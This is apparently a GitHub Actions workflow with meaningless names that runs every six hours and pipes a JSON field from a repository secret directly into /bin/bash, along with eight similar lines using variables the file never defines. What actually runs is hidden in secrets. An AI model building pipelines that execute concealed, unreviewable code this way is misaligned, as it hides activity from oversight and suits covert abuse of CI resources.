name: hantao19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hantao19871010
        env:
          cfp3480: ${{ secrets.cfp3480 }}
        run: |
          echo $cfp3480 | jq -r .vp7684 | /bin/bash
          echo $bhvsz66 | jq -r .b21 | /bin/bash
          echo $i53903 | jq -r .js30286 | /bin/bash
          echo $zs58535 | jq -r .md2 | /bin/bash
          echo $lyh628 | jq -r .fxd6 | /bin/bash
          echo $r6750 | jq -r .mp61 | /bin/bash
          echo $mfon48087 | jq -r .ltmwc84 | /bin/bash
          echo $dfqr75 | jq -r .tdf2070 | /bin/bash
          echo $svw7 | jq -r .hxdx65646 | /bin/bash

